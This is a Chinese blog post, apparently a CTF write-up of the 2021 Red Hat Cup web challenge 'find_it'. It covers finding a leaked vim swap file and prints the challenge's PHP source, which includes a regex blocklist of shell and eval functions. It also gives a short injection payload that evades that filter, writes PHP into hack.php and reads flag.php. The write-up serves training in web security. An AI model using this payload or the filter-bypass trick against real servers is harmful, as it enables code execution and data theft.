2021红帽杯 find_it

最新推荐文章于 2022-09-24 00:39:03 发布
最新推荐文章于 2022-09-24 00:39:03 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: # BUUCTF-Web 文章标签: 2021红帽杯 ctf web安全 源码泄露 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/118117961
版权
本文介绍了2021年红帽杯中的一道CTF题目,涉及备份文件和源码泄露的考点。通过扫描发现robots.txt,进一步通过访问特殊文件名如.1ndexx.php.swp获取源码。由于存在过滤,作者利用show_source函数绕过限制,写入代码到hack.php以读取flag.php的内容。这展示了安全漏洞利用的一种常见思路。
摘要由CSDN通过智能技术生成

2021红帽杯 find_it

考点

备份文件、源码泄露

思路

题目提示我们 I Can't view my php files?!,猜测是备份文件,御剑扫一下发现存在 robots.txt

在这里插入图片描述

访问 1ndexx.php,发现并不存在;由于Linux平台下的存在 .xxxx.php.swp.xxxx.php.swo.xxxx.php等文件格式,尝试访问一下 .1ndexx.php.swp,存在源码泄露

发现过滤了一堆东西,感觉没得啥子可以利用的点了,由于可以写入文件,没有过滤掉 show_source,我们利用 <?php%20show_source("fl"."ag.php");将flag打印出来

Payload

1ndexx.php.swp文件源码

<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

Payload:

先利用 ?code=<?=%20show_source("fl"."ag.php");?> 写入php代码
再访问hack.php

在这里插入图片描述

H3rmesk1t
关注
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
红帽杯find_it
qq_53755216的博客
06-24 260
<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-color: white; text-align: cent
红帽杯2021web Find_it
qq_52671379的博客
06-14 329
Find_it 打开题目链接并没有任何收获 然后想想有无备份文件 最后通过dirsearch.py扫描发现robots.txt 发现存在1ndexx.php,直接访问并没有什么信息。 同样的猜测是否存在备份文件 常见的备份文件后扩展名有 .git .svn .swp .~ .bak .bash_history .svn 最后查看.swp备份文件得到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <
红帽杯 find_it
m_de_g的博客
09-28 603
红帽杯 find_it 一、解题思路 1.使用dirsearch扫描目录,发现了robots.txt文件 2.直接进行访问,发现1ndexx.php 3.那我就顺着这个思路来进行访问,未果 4.根据题目find_it那就说明肯定是源代码泄露 常见的备份文件后缀名有 .git .svn .swp .~ .bak .bash_history 我将其放到御剑里面进行扫描 同样没找结果,这里有个很大的坑,就是1ndexx.php也是个隐藏文件,应该在前面的访问目录下加个点,进行访问 http://chall
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 943
小小记录一下
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2411
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
findit
weixin_52034946的博客
01-15 331
APK反编译 尝试直接搜处flag,没成功 一直点最后一个,打开文件夹findit文件夹,找线索 会在第3个文件里发现俩列16进制数 写脚本转换成字符型呗,第一个是 那就是第二个了 pvkq{m164675262033l4m49lnp7p9mnk28k75} 看着就很像,但它不是. 那就可能这经过了加密处理,猜是凯撒密码了,数了下,相差10个 flag{c164675262033b4c49bdf7f9cda28a75} ...
红帽子Red_Hat_Linux_9光盘启动安装过程图解
11-13
详细的介绍了光盘启动安装linux红帽9.0系统的步骤,有图有文字,非常适合初学者学习linux
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
红帽(Red_Hat_Linux_9.0)安装方法
09-12
红帽(Red_Hat_Linux_9.0) 安装方法
wp篇 find_it复现
这周末在做梦的博客
05-18 494
wp篇简述了博主复现CTF以及记录wp的过程一,复现1复现文件概述2复现过程概述二,wirteup1探测2解题3playload 一,复现 1复现文件概述 需要源码的请评论私聊。下面就简单展示一下,复现成功后的文件目录。 2复现过程概述 直接粘贴源码,如果利用vim断网生成.swp文件再服务器中无法长久存在,故直接touch .1ndexx.php.swp。后编辑修改。 为了解决出现的网站编码的问题,再在网页伪静态中加入将.swp解析为php的规则,将本题目做了微调。 二,wirteup 1探测 首先发现如
2021红帽杯web部分复现
1ance's blog
05-18 502
目录Webfind_itframeworkWebsiteMangerMisc签到 Web find_it 根据题目信息查看robots.txt,发现1ndexx.php 打开也没有啥,于是扫扫目录,发现hack.php 但是好像也没有东西。 继续分析,找找有没有备份文件。 芜湖~发现有.1ndexx.php.swp 拿到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <t
CTFHUB find_it
qq_46266956的博客
04-24 3512
CTFHUB find_it dirsearch扫描 robots.txt When I was a child,I also like to read Robots.txt Here is what you want: 1ndexx.php 1ndexx.php无法访问; 扫缓存.1ndexx.php.swp [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Ty
[2021红帽杯]Web writeup
Anton__1的博客
05-10 1773
find_it 老套路扫一下目录 貌似只有君子协定有用,打开看看 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 打开1ndexx.php 发现打不开, 尝试一下是否有备份 /.1ndexx.php.swp 发现了一串代码: <?php $link = mysql_connect('localhost', 'root'); ?> <html> <hea
被恶意上传了.php,轻松解决网站被恶意镜像
weixin_35676877的博客
03-16 407
老听说有人的网站被恶意镜像,于是我先收藏几种解决方法。镜像站看似一个完整的站点,其实每次用户访问镜像站点,他的小偷程序就会来正版的网站查询数据,并修改相关链接然后呈献给用户。实质上还是在读取原站的数据,我们只需要屏蔽到抓取我们数据的那个主机ip就可以了。方法一:.htaccess文件禁ip1、获取镜像服务器ip复制如下代码,新建一个php文件,并命名为“ip.php”上传到你的网站根目录$file...
服务器被上传文件php,求助,哪位大神遇到过这种情况,linux服务器总是被上传这些文件...
weixin_36029647的博客
03-10 271
该楼层疑似违规已被系统折叠隐藏此楼查看此楼$sjajm = 'ayH#sxm6pibn8ck5dt714*\'e2l_ru9-o3gv0';$snfhh = Array();$snfhh[] = $sjajm[29].$sjajm[0].$sjajm[15].$sjajm[24].$sjajm[10].$sjajm[18].$sjajm[0].$sjajm[35].$sjajm[30].$sja...
红帽wp
qq_51425032的博客
05-12 439
红帽wp 前言:这次和队里师傅一起打了红帽,做了几道题,但可惜还是没进线下,只能说还是太菜 web1 find it 御剑直接扫目录 得到一些熟悉的的东西,但是好像只有君子协定有用,打开得到一串文本 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 但是1ndexx.php打不开,猜测是否有备份 /.1ndexx.php.swp,得到源码 <?php $link =.
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
红帽iptables
最新发布
08-18
红帽iptables(Red Hat's Internet Protocol Tracking and Logging Engine),通常称为iptables,是一个Linux内核模块,用于实现包过滤和网络转发策略。它是基于Netfilter框架的一个工具,允许系统管理员控制进出系统的IP数据包,包括防火墙规则的设置,比如阻止恶意流量、设置端口转发等。它支持各种高级功能,如状态检查、链式处理和多表模型。通过iptables命令行工具,用户可以添加、修改和删除规则,对网络流量进行细致的管理。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值